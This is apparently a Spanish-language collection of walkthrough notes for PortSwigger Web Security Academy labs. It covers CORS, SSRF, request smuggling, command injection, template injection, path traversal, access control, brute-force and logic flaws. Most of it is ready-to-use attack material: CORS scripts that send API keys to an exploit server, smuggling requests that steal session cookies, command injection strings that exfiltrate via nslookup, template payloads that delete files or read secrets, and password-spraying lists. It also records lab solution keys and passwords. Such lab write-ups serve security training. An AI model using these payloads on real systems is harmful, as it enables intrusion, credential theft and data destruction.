location='/log?key=' + x.apikey;
};
Este laboratorio es muy similar al anterior, difiriendo en que, al mandar la request al repeater y setear el header Origin como null, la respuesta tendrá el encabezado Access-Control-Allow-Origin como null.
Para resolver este lab, copiamos la url de la sección Home, y le anexamos "accountDetails" (debido a que a esta url se hacen las peticiones que devuelve la apikey, se puede ver analizando el HTTP History de burpsuite), y la pegamos en la línea del req.open del siguiente script. Por último, copiamos la url del exploit server del laboratorio y la pegamos en la línea location, a la cual le concatenamos la apikey de la respuesta (también se podría usar un servidor externo como el burp collaborator). Luego de pulsar el botón deliver exploit to victim, debemos ver las respuestas del servidor yendo a la sección Acces log. Una vez allí, buscamos "log?key", y lo que sigue será el apikey que debemos enviar.
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest ();
req.onload = reqListener;
req.open('get','https://ac6c1f321e10fef48028145c000f0017.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
var x = JSON.parse(this.responseText);
location='https://ac281f0c1eb1fe6c80d814b401080062.web-security-academy.net/log?key='+x.apikey;
};
</script>"></iframe>
Al acceder a este laboratorio y autenticarnos, si en la página principal hacemos click en un botón view details, y en el drop-down del fondo de la página seleccionamos algo y hacemos click en Check stock, se nos abrirá una ventana indicando el stock level. Al igual que en los laboratorios anteriores, accediendo a la sección Account Details se puede ver impresa la apikey, y analizando la request y response haciendo uso del repeater de burpsuite, si en origin anteponemos "subdominio." a la url origen de la request, veremos que la respuesta sigue siendo válida. Ahora, analizando con el intecept de burpsuite la ventana que se abre al clickear Check Stock mencionada anteriormente, podemos ver que se le envía un parámetro "/?productId=", yendo al decoder de burpsuite y codificando como URL lo siguiente "", si editamos la petición interceptada y le ponemos como parámetro de productId lo que acabamos de encodear, veremos que se ejecuta el alert que definimos. Por último, observando la url de dicha ventana, veremos que es un subdominio del laboratorio en el que estamos trabajando.
Para resolver el laboratorio, en el siguiente script deberemos pegar la url del mismo, teniendo cuidado en la línea de document.location, ya que en la misma debe ir el subdominio de la ventana que se abre al hacer click en Check stock. La url que debe ir dentro de la función reqListener es la del exploit server.
<script>
document.location="http://stock.ac6e1ff21fdb2eaa8059129e00570000.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://ac6e1ff21fdb2eaa8059129e00570000.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://ac631f561f612e128085127d0143004d.web-security-academy.net/exploit/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
No pudimos resolver el laboratorio porque se requiere usar el Burp Collaborator Client, que sólo están disponibles en la versión Pro de Burp Suite.
- Consultar el stock de un producto y capturar la request
- Setear el parámetro stockApi=http://localhost/admin/delete?username=carlos
- Consultar el stock de un producto y capturar la request
- En Burp Intruder setear el parámetro stockApi=http://192.168.0.$XX$:8080/admin/delete?username=carlos haciendo variar la XX (último octeto de la IP) entre 1 y 255
Al entrar en los detalles de algún producto y pulsar Check Stock, interceptando con burpsuite y mandando la petición al repeater, al cambiar el valor de stockApi por http://127.0.0.1/, obtenemos un bloqueo de la petición. Lo omitimos cambiando a http://127.1/. Al poner http://127.1/admin nuevamente se bloquea la petición, por lo que sería conveniente ofuscar caracteres. Una opción para evitar el bloqueo es ofuscano caracteres, por ejemplo la letra 'a' = %2561: http://127.1/%2561dmin O la letra d = %2564: http://127.1/a%2564min De esta manera podemos acceder a la interfaz de administración y eliminar usuarios
Al entrar en los detalles de algún producto y pulsar Check Stock, interceptando con burpsuite y mandando la petición al repeater, al cambiar el valor de stockApi por http://127.0.0.1/, obtenemos un status 400 con el mensaje "External stock check host must be stock.weliketoshop.net". Cambiamos la URL a http://[email protected]/ y observamos que acepta. Al agregar # al nombre de usuario, la URL es rechazada. Ofuscando el # como %2523 lo acepta, es decir, si cambiamos la url por: http://localhost:80%[email protected]/admin/ Accedemos al panel de administración, de donde podemos obtener la url para eliminar usuarios, la cual es: http://localhost:80%[email protected]/admin/delete?username=carlos
Al entrar en los detalles de algún producto y pulsar Check Stock, interceptando con burpsuite y mandando la petición al repeater, al cambiar el valor de stockApi por una url que sea de un host diferente, devuelve un status 400 y el mensaje "Invalid external stock check url 'Invalid URL'". Al hacer click en Next Product e interceptar la request con burpsuite, vemos que se tiene un open redirection. Es posible entonces aprovechar esta vulnerabilidad para pasar la redirección al panel de administración de la siguiente manera: /product/nextProduct?path=http://192.168.0.12:8080/admin Esta url le pasamos al parámetro stockApi, de la request que se manda al pulsar el botón Check Stock, y accedemos al panel de administración, de donde podemos extraer las urls para eliminar usuarios, la cual sería: /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
No pudimos resolver el laboratorio porque se requiere usar el Burp Collaborator Client, que sólo están disponibles en la versión Pro de Burp Suite.
No pudimos resolver el laboratorio porque se requiere usar el Burp Collaborator Client, que sólo están disponibles en la versión Pro de Burp Suite.
Enviar 2 veces la siguiente request:
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 6
Transfer-Encoding: chunked
0
G
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater y mantener los 2 saltos de línea del final):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
82
GPOST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
0
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater y mantener los 2 saltos de línea del final):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
82
GPOST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
0
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 30
Transfer-Encoding: chunked
0
GET /asd HTTP/1.1
Foo: bar
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater y mantener los 2 saltos de línea del final):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
83
GET /asd HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
0
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 91
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Length: 30
foo
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater y mantener los 2 saltos de línea del final):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 4
Transfer-Encoding: chunked
6C
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Length: 4
Transfer-Encoding: chunked
0
Enviar 2 veces la siguiente request (desactivar "Update Content-Length" de Burp Repeater y mantener el salto de línea del final):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 52
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Content-Length: 150
search=asd
En la segunda response, arriba del input de búsqueda debería aparecer algo como:
0 search results for 'POST / HTTP/1.1
X-vDTCOL-Ip: 181.117.13.38
Host: ac0d1fb51fe4661f80e980ba003200cb.web-security-academy.net
Content-Length: 52
Transfer-Enco'
Enviar 2 veces la siguiente request, reemplazando el header X-******-Ip con el obtenido en la request anterior:
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 98
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-******-Ip: 127.0.0.1
Content-Length: 30
foo
- Realizar un comentario en cualquier post, observar la request y copiar el valor de la cookie de sesión y del csrf token.
- Realizar la siguiente request reemplazando los valores de la cookie de sesión y del csrf token:
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 265
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 777
Cookie: session=COOKIE-SESSION-VALUE
csrf=CSRF-TOKEN&postId=6&name=asd&[email protected]&website=&comment=
- Dirigirse a LABID.web-security-academy.net/post?postId=6 (o el postId que se haya ingresado en la request del paso 2).
- Si en lugar de ver el comentario de la víctima en el post se obtiene un internal server error, repetir el paso 2 y 3 hasta que aparezca el comentario (esto se debe a que PortSwigger simula que la víctima navega por el sitio de forma intermitente).
- Copiar el valor de la cookie de sesión del comentario.
- Iniciar sesión con credenciales inventadas, interceptar la request y reemplazar la cookie de sesión con la obtenida del comentario de la víctima.
GET / HTTP/1.1
Host: ac721f751e1949f880d148b3002500b5.web-security-academy.net
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cookie: victim-fingerprint=x0I5pEGy04Dgy8e20sThcT1WS83zPPeC; secret=7Kwj9ztbTjKb7ir6vhoOtLq5S7XwR7WQ; session=4VUfBbaKXwzTjsMDAzgC8ecnDQhISoRV
Enviar la siguiente request:
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 82
Transfer-Encoding: chunked
0
GET /post?postId=6 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
asd
En caso de que no se dé como resuelto el laboratorio, volver a enviarla hasta conseguirlo (esto se debe a que PortSwigger simula que la víctima navega por el sitio de forma intermitente).
- Ir al exploit server, poner en el body: alert(document.cookie) y guardar
- Enviar la siguiente request (reemplazando LABID y EXPLOIT-SERVER-ID):
POST / HTTP/1.1
Host: LABID.web-security-academy.net
Content-Length: 130
Transfer-Encoding: chunked
0
GET /post/next?postId=6 HTTP/1.1
Host: EXPLOIT-SERVER-ID.web-security-academy.net
Content-Length: 108
foo
- Enviar la siguiente request (reemplazando LABID):
GET /post?postId=7 HTTP/1.1
Host: LABID.web-security-academy.net
- Repetir la request del paso 3 para confirmar que se envenenó la cache y siempre se responde con la redirección al exploit server.
- Enviar la siguiente request:
POST / HTTP/1.1
Host: ac5a1f211f44e31180d4a4c4000400fd.web-security-academy.net
Content-Length: 39
Transfer-Encoding: chunked
0
GET /my-account HTTP/1.1
foo: bar
- Ir al inicio del sitio web (LABID.web-security-academy.net/)
- Buscar entre las request realizadas las palabras "API Key" (se puede buscar a la derecha abajo de la response y recorrer todas las request o desde el menú Burp->Search si se tiene la versión Pro)
- Si se encuentra, enviar la API Key de la víctima como solución. Sino, repetir los pasos 1 a 3 (puede llevar muchas repeticiones del mismo proceso hasta que aparezca).
6MM7nNMckO31arHOfLkLKJyGhNnKz2cl
- Consultar el stock de un producto y capturar la request
- Setear el parámetro storeId=1|whoami
- Enviar un mensaje de feedback y capturar la request
- Setear el parámetro email=||ping -c 10 127.0.0.1||
- Enviar un mensaje de feedback y capturar la request
- Setear el parámetro email=||whoami>/var/www/images/file.txt||
- Acceder a https://LABID.web-security-academy.net/image?filename=file.txt
- Enviar un mensaje de feedback y capturar la request
- Setear el parámetro email=||nslookup burpcollaborator.net||
- Enviar un mensaje de feedback y capturar la request
- Abrir Burp collaborator client y generar/copiar el "collaborator payload"
- Setear el parámetro email=||nslookup `whoami`.fn6xqhhzgnulzs5qkh18xj7ek5qwel.burpcollaborator.net|| reemplazando por la url generada
- En Burp collaborator client hacer un poll y verificar en las solicitudes recibidas el usuario
peter-bC8z09
Al ver los detalles de un producto sin stock, se muestra de forma insegura el mensaje pasado mediante el parámetro message en la URL, posibilitando pasar un parámetro que sea evaluado en el servidor por el template ERB.
Dirigirse a https://LABID.web-security-academy.net/?message=<%=system("rm /home/carlos/morale.txt")%>
La funcionalidad que permite cambiar el nombre mostrado en los comentarios realizados en los post setea la propiedad del usuario que se debe mostrar (por ejemplo user.name). Al mostrar un comentario, esto es evaluado de forma insegura por el template, siendo vulnerable a un server-side template injection (la web usa Tornado). Esto se puede verificar tomando dicha request, seteando el parámetro blog-post-author-display=user.name}}{{2*6 y comprobando que en los comentarios se muestra el nombre junto con un 12 al final.
- Ir a My account y modificar el preferred name.
- Repetir la request seteando el parámetro blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')
- Hacer un comentario en cualquier post.
Al editar un post vemos que se evalúan ciertas expresiones como ${product.price}. Además, la web está configurada en modo debug por lo que se puede escribir algo como ${variablenodeclarada} de manera que se produzca un error, siendo informados así del sistema de templates que se está usando. Con esto descubrimos que se trata de Freemaker de Java y podemos recurrir a la documentación o al post sobre dicho exploit.
En la edición de un post insertar lo siguiente <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") } y guardar.
Al ver un producto sin stock se muestra el mensaje de error correspondiente. Podemos insertar ?message={{7*7}} en la url para obtener un error y determinar que se trata de Handlebars de NodeJS. Realizando una búsqueda podemos encontrarnos con este exploit y utilizar el mismo modificándolo para eliminar el archivo deseado:
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('fs').unlinkSync('/home/carlos/morale.txt');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
Luego basta con encodear el mismo y enviarlo como valor del parámetro message.
Ir a LABID.web-security-academy.net/?message=wrtz{{%23with "s" as |string|}}%0A%20 {{%23with "e"}}%0A%20%20%20 {{%23with split as |conslist|}}%0A%20%20%20%20%20 {{this.pop}}%0A%20%20%20%20%20 {{this.push (lookup string.sub "constructor")}}%0A%20%20%20%20%20 {{this.pop}}%0A%20%20%20%20%20 {{%23with string.split as |codelist|}}%0A%20%20%20%20%20%20%20 {{this.pop}}%0A%20%20%20%20%20%20%20 {{this.push "return require('fs').unlinkSync('%2Fhome%2Fcarlos%2Fmorale.txt')%3B"}}%0A%20%20%20%20%20%20%20 {{this.pop}}%0A%20%20%20%20%20%20%20 {{%23each conslist}}%0A%20%20%20%20%20%20%20%20%20 {{%23with (string.sub.apply 0 codelist)}}%0A%20%20%20%20%20%20%20%20%20%20%20 {{this}}%0A%20%20%20%20%20%20%20%20%20 {{%2Fwith}}%0A%20%20%20%20%20%20%20 {{%2Feach}}%0A%20%20%20%20%20 {{%2Fwith}}%0A%20%20%20 {{%2Fwith}}%0A%20 {{%2Fwith}}%0A{{%2Fwith}}
- Iniciar sesión con las credenciales brindadas (content-manager:C0nt3ntM4n4g3r)
- Editar la descripción de un producto, ingresar {{7+'7'}} para obtener un error, determinando así que se está utilizando Django
- Ingresar {{settings.SECRET_KEY}} para obtener la secret key del framework
ce7yt92pn5jo8evzdf6hpmi144g0e9zd
- Iniciar sesión con las credenciales brindadas (content-manager:C0nt3ntM4n4g3r)
- Editar la descripción de un producto, ingresar ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
- Convertir el resultado obtenido de bytes en código ASCII a string
k67lsge9ztl9117fcefl
- Iniciar sesión con las credenciales brindadas (wiener:peter), ir a My account y modificar el nombre que se muestra en los comentarios de los post
- Modificar y enviar dicha request seteando blog-post-author-display=user.setAvatar('/home/carlos/.ssh/id_rsa','image/jpg')
- Realizar un comentario en cualqueir post y volver a dicho post para visualizar el comentario, ejecutando así el template injection y cargando como avatar el archivo a eliminar
- Modificar y enviar la request del paso 2 seteando blog-post-author-display=user.gdprDelete()
- Actualizar la página del post, ejecutando nuevamente el template injection y eliminando así el avatar (es decir, el archivo objetivo)
Hacer una request a https://LABID.web-security-academy.net/image?filename=../../../etc/passwd
Hacer una request a https://LABID.web-security-academy.net/image?filename=/etc/passwd
Hacer una request a https://LABID.web-security-academy.net/image?filename=....//....//....//etc/passwd
Hacer una request a https://LABID.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd
Hacer una request a https://LABID.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
Hacer una request a https://LABID.web-security-academy.net/image?filename=../../../etc/passwd%00.png
Existe un panel de administrador que no se encuentra protegido. Para hallar su url, dirigirse a https://url_del_laboratorio/robots.txt y observar que se inidicó no indexar /administrator-panel
- Dirigirse a https://url_del_laboratorio/administrator-panel y eliminar el usuario carlos
Para encontrar la url del panel de administrador, inspeccionar el código de la página de inicio y buscar el script que indica la url del mismo en:
- <body>
- <div theme="ecommerce">
- <section class="mainContainer">
- <div class="container">
- <header class="navigation-header">
- <section class="top-links">
- <header class="navigation-header">
- <div class="container">
- <section class="mainContainer">
- <div theme="ecommerce">
- Dirigirse a https://url_del_laboratorio/admin-gbd53v y eliminar el usuario carlos
Activar en burp proxy la intercepción de las solicitudes, iniciar sesión con las credenciales proporcionadas (wiener:peter), forwardear la request y modificar en la respuesta la cookie Admin seteandola en true, dirigirse al panel de administrador y eliminar el usuario carlos, modificando la cookie en cada solicitud.
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Ir a My account, cambiar el email, interceptar la request y agregar "roleid":2 quedando así: { "email":"[email protected]", "roleid":2 }
- Ir a LABID.web-security-academy.net/admin y eliminar el usuario carlos
Realizar la siguiente request:
GET /?username=carlos HTTP/1.1
Host: LABID.web-security-academy.net
X-Original-URL: /admin/delete
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Realizar la siguiente request, reemplazando LABID y COOKIE-SESSION-VALUE:
PUT /admin-roles HTTP/1.1
Host: LABID.web-security-academy.net
Cookie: session=COOKIE-SESSION-VALUE
username=wiener&action=upgrade
- Iniciar sesión con las credenciales brindadas
- Ir a My account y cambiar el parámetro id de la url a LABID.web-security-academy.net/my-account?id=carlos
- Enviar la API Key como solución
lju45WipAzADFwJpbAuEDxYEQohba9Kc
- Buscar un post que haya sido escrito por carlos, hacer click en su nombre obteniendo así su ID en la url.
- Iniciar sesión con las credenciales brindadas
- Ir a My account y cambiar el parámetro id de la url a LABID.web-security-academy.net/my-account?id=carlos
- Enviar la API Key como solución
2yG2kvUx4G4YGtTopcA0i3rhf6agGKG3
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Ir a My account y cambiar el parámetro id de la url a LABID.web-security-academy.net/my-account?id=carlos
- Mirar en Burp la response, la cual junto con la redirección contiene la página como si hubiera sido cargada normalmente
- Enviar la API Key como solución
lgCjKOybA0VIA2r6BA8kOHqo3XcllD5o
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Ir a My account y cambiar el parámetro id de la url a LABID.web-security-academy.net/my-account?id=administrator
- Inspeccionar el input enmascarado de cambio de contraseña, obteniendo así su valor
- Iniciar sesión con la cuenta administrator y la contraseña obtenida en el paso anterior, y eliminar el usuario carlos
Username: administrator Password: 9mj07l2mgwqlnydilrxg
- Ir a LABID.web-security-academy.net/download-transcript/1.txt
- Abrir el archivo descargado, el cual contiene la contraseña del usuario carlos
- Iniciar sesión con el usuario carlos y la contraseña obtenida en el paso anterior
Username: carlos Password: 32433u498gsetj66a498
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Enviar la siguiente request reemplazando LABID y COOKIE-SESSION-VALUE:
POST /admin-roles HTTP/1.1
Host: LABID.web-security-academy.net
Cookie: session=COOKIE-SESSION-VALUE
Content-Length: 45
action=upgrade&confirmed=true&username=wiener
- Iniciar sesión con las credenciales brindadas (wiener:peter)
- Enviar la siguiente request reemplazando LABID y COOKIE-SESSION-VALUE:
GET /admin-roles?username=wiener&action=upgrade HTTP/1.1
Host: LABID.web-security-academy.net
Referer: https://LABID.web-security-academy.net/admin
Cookie: session=COOKIE-SESSION-VALUE
Intentar acceder con los diferentes usuarios listados hasta que el mensaje de error sea "Incorrect password" en lugar de "Invalid username". Una vez que se ha encontrado un usuario válido, probar con las diferentes contraseñas listadas hasta lograr acceder. Este proceso se puede automatizar utilizando el intruder de Burp:
- Hacer una request de login y enviar al intruder.
- En la pestaña Position seleccionar el ataque de tipo Sniper, parametrizar el usuario y deja fija una contraseña cualquiera.
- En la pestaña Payload pegar el listado de usuarios e iniciar ataque.
- Analizar la longitud de la respuesta, identificando aquella de longitud diferente y verificando el cambio en el mensaje de error.
- En la pestaña Position, dejar fijo el usuario encontrado en el paso anterior y parametrizar la contraseña.
- En la pestaña Payload pegar el listado de contraseñas e iniciar el ataque.
- Observar el cambio en el código de respuesta cuando la contraseña es la correcta.
- Utilizar el usuario y contraseña identificados para iniciar sesión e ir a My account para completar el laboratorio.
- Username: att
- Password: 12345
Repetir los pasos del laboratorio anterior pero en lugar de observar la longitud de la respuesta para el nombre de usuario, identificar el mensaje de error que le falta el punto en "Invalid username or password.". Esto se puede hacer más fácilmente si se extrae el mensaje de error: antes de iniciar el ataque, ir a pestaña Options, en la sección Grep-Extract cliquear en Add y seleccionar con el mouse el contenido de la respuesta que corresponde al mensaje de error. Luego, iniciar el ataque; se mostrará para cada petición el mensaje de error correspondiente, pudiendo identificar rápidamente aquél que es distinto (para ello también se pueden ordenar los resultados por la columna correspondiente al mensaje de respuesta).
- Username: appserver
- Password: superman
Repetir los pasos de los laboratorios anteriores con las siguientes consideraciones:
- Seleccionar pitchfork como tipo de ataque.
- Dejar fija como contraseña una cadena larga de caracteres (100 o más). Esto se debe a que la respuesta es más lenta cuando un usuario es correcto y se debe verificar la contraseña. Cuando más larga es la contraseña, más tarda la respuesta.
- Añadir a la request el header X-Forwarded-For, parametrizando este y el usuario. El propósito de este header es evitar que se bloqueen las reiteradas solicitudes.
- En el payload correspondiente al header, seleccionar un payload de tipo numérico, entre 1 y 100 con step 1 para que se modifique en cada solicitud.
- En los resultados, añadir la columna Response Received e identificar aquella con un tiempo considerablemente mayor. Esta corresponderá a un usuario válido.
- Username: admins
- Password: abc123
El escenario bloquea la IP cuando se producen 3 intentos fallidos de inicio de sesión. Sin embargo, ante un inicio de sesión correcto, ese contador se resetea. Esto se puede utilizar para parametrizar usuario y contraseña de la solicitud, alternando 2 intentos de acceso con el usuario objetivo (carlos) y 1 con nuestro usuario hasta dar con la contraseña correcta.
- Username: carlos
- Password: george
En este caso una cuenta existente se bloquea luego de 5 intentos de acceso fallidos. Esto se puede utilizar para obtener un usuario válido:
- Utilizar el ataque "Cluster bomb" para realizar 5 intentos de acceso a cada usuario de la lista.
- Observar la longitud de la respuesta para identificar aquél con el mensaje de error distinto, avisando que la cuenta ha sido bloqueada.
Con el usuario identificado, realizar un ataque de fuerza bruta sobre la contraseña. Al intentar acceder con la contraseña correcta a una cuenta bloqueada, existe un bug lógico por el cual el error de que la cuenta está bloqueada no se muestra, por lo que se puede identificar dicha contraseña y, una vez pasado el tiempo de bloqueo, acceder a la cuenta.
- Username: accounts
- Password: 11111111
Existe una falla lógica que al enviar en una request un array de contraseñas, todas ellas son evaluadas, obteniendo acceso siempre que se incluya la correcta.
Enviar una request con:
- Username: "carlos"
- Password: ["123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow"]
Al ingresar un usuario y contraseña correctos, el sistema ya inicia la sesión, y redirige al usuario a una página donde solicita el código de verificación enviado al email. Como la sesión ya se inició, se puede acceder a urls protegidas, saltando el control del código.
Ingresar con las credenciales de la víctima (carlos:montoya) y cuando el código de verificación sea solicitado, reemplazar manualmente la url por /my-account
Existe un error lógico por el cual se puede ingresar a una cuenta conociendo su usuario y código de verificación, sin ingresar su contraseña. Esto se debe a que la sesión se inicia al ingresar un código de verificación correcto asociado al usuario con el que teóricamente se ingresó. Sin embargo, se puede modificar el usuario en la request, por lo que es vulnerable a:
- Ingresar con las credenciales brindadas (wiener:peter).
- Ingresar un código de verificación cualquiera.
- Modificar la solicitud de generación del código de verificación (realizada automáticamente en el paso 1), reemplazando nuestro usuario por el usuario objetivo (carlos).
- Modificar la solicitud en la que se envía el código de verificación (paso 2), reemplazando nuestro usuario por el usuario objetivo.
- Realizar un ataque de fuerza bruta sobre el código de verificación del usuario objetivo, siendo este un código numérico de 4 dígitos.
- Código de verificación: 0068
Existe una protección contra ataques de fuerza bruta al código de verificación: si se ingresan 2 códigos de verificación erróneos, el usuario debe volver a autenticarse con su usuario y contraseña. La solución a este problema consiste en establecer una macro en Burp que vuelva a iniciar la sesión del usuario en cada request y luego hacer un ataque por fuerza bruta idéntico al del laboratorio anterior.
- Código de verificación: 1041
Existe una protección contra ataques de fuerza bruta que bloquea los inicios de sesión una vez que se han producido 5 intentos fallidos. Sin embargo, la funcionalidad para mantener iniciada una sesión se implementa mediante cookies, las cuales guardan el usuario y la contraseña (en MD5) encodeados en base 64. De esta manera, se puede realizar un ataque de fuerza bruta utilizando esta cookie para iniciar sesión.
- Cookie stay-logged-in: Y2FybG9zOjIxYjcyYzBiN2FkYzVjN2I0YTUwZmZjYjkwZDkyZGQ2 (que corresponde a carlos:matrix)
Se utiliza la misma cookie del laboratorio anterior para guardar la sesión y, además, el blog es vulnerable a un XSS en los comentarios de los post. Por lo tanto, se puede hacer una solicitud al exploit server del laboratorio con el valor de la cookie del usuario. Una vez que el usuario ingresa al post, se ejecuta el script que envía su cookie de stay-logged-in, por lo que solo resta revisar las solicitudes recibidas en el exploit server y decodificar la cookie (y desencriptar la contraseña que se encuentra en MD5) para obtener sus credenciales.
- Username: carlos
- Password: onceuponatime
En la funcionalidad de recuperación de contraseña, al establecer la nueva contraseña, se envía en la request tanto la nueva contraseña como el usuario correspondiente y no se realiza ningún chequeo sobre el parámetro temp-forgot-password-token, por lo que cualquier usuario puede realizar una solicitud con el nombre de usuario que desee atacar y cambiarle la contraseña, obteniendo acceso a dicha cuenta.
El link generado para la recuperación de contraseñas utiliza un token para identificar al usuario correspondiente al que se le generará la nueva contraseña. Sin embargo, la request en la que se solicita dicho link admite el header X-Forwarded-Host, por lo que se puede solicitar la recuperación de contraseña del usuario objetivo cambiando el header mencionado y enviando así dicha solicitud al exploit server, consiguiendo de esta manera acceso al token del usuario y pudiendo, por lo tanto, establecer la nueva contraseña para dicho usuario.
- temp-forgot-password-token: Y9UnwhR8m30gML08KsJi1FAST4aI6aWi
La funcionalidad de cambio de contraseña especifica en la request el usuario que inició sesión y que quiere cambiar la contraseña (pudiendo por lo tanto modificarlo), pero solicita la contraseña actual que es desconocida. A su vez, como protección contra ataques de fuerza bruta, bloquea la cuenta cuando se ingresa una contraseña actual incorrecta. Sin embargo, si los campos nueva contraseña y repetir nueva contraseña no coinciden, este control no se hace, diferenciando además el mensaje de error cuando la contraseña actual es incorrecta de cuando la contraseña actual es correcta pero las nuevas contraseñas no coinciden, por lo que se puede realizar un ataque de fuerza bruta sobre la misma.
- Username: carlos
- Password: starwars
Hacer una request de los detalles de un producto, pasando como productId un string: https://LABID.web-security-academy.net/product?productId=asd
2 2.3.31
- Buscar en los comentarios la url de debug
- Hacer una request a https://LABID.web-security-academy.net/cgi-bin/phpinfo.php para obtener la secret key
3jbksebn9ti5zjbmlfzu00z21i8qv3bp
- Buscar en robots.txt las url no indexadas
- Ir a https://LABID.web-security-academy.net/backup
- Acceder al archivo ProductTemplate.java.bak
- Identificar la contraseña de la base de datos en la cadena de conexión
75x280c4b39i7byks9ts7przmhnax61p
- Añadir una regla de reemplazo de headers en el proxy de Burp, ingresando como contenido de reemplazo: X-Custom-IP-Authorization: 127.0.0.1
- Acceder a https://LABID.web-security-academy.net/admin
- Eliminar la cuenta de Carlos
- Descargar los archivos de https://LABID.web-security-academy.net/.git
- En el directorio hacer git log para ver los commits
- Hacer git reset 8ec321d3725b8fcf2555675518f9853377ae1ed5 para volver al commit anterior a la eliminación de la contraseña de administrador
- Hacer git checkout . para restaurar el archivo admin.conf eliminado y abrirlo para ver la contraseña
Username: administrator Password: b0x8mj81062zzrosml0q
Al añadir un producto al carrito de compras, el precio del mismo se especifica en la request, por lo que puede ser modificado.
- Iniciar sesión con las credenciales proporcionadas (wiener:peter)
- Ver los detalles de Lightweight "l33t" Leather Jacket
- Activar la intercepción en Burp proxy
- Añadir al carrito el producto
- En la request interceptada, modificar el parámetro price por un valor entero (por ejemplo 1 centavo)
- Completar la orden
Al añadir un producto al carrito de compras, la cantidad añadida se especifica en la request, por lo que puede ser modificada, y no se controla que la cantidad sea positiva, por lo que se puede especificar una cantidad negativa de un producto para conseguir un descuento en la compra de otros productos.
- Iniciar sesión con las credenciales proporcionadas (wiener:peter)
- Ver los detalles de algún producto que no sea Lightweight "l33t" Leather Jacket
- Activar la intercepción en Burp proxy
- Añadir al carrito el producto
- En la request interceptada, modificar el parámetro cantidad por un valor negativo
